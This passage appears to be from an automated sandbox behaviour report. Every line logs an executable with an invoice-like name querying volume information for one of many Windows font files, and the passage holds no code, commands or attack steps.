            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
